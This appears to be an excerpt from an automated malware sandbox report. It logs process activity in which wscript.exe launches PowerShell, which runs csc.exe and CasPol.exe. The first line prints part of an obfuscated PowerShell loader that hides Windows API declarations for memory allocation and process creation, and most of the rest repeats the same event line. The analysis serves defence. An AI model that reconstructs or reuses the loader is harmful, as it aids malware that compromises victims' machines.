        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKl
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_200F1288 push ss; iretd
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 17_2_201058B0 push 0000001Fh; ret
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.dllJump to dropped file
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
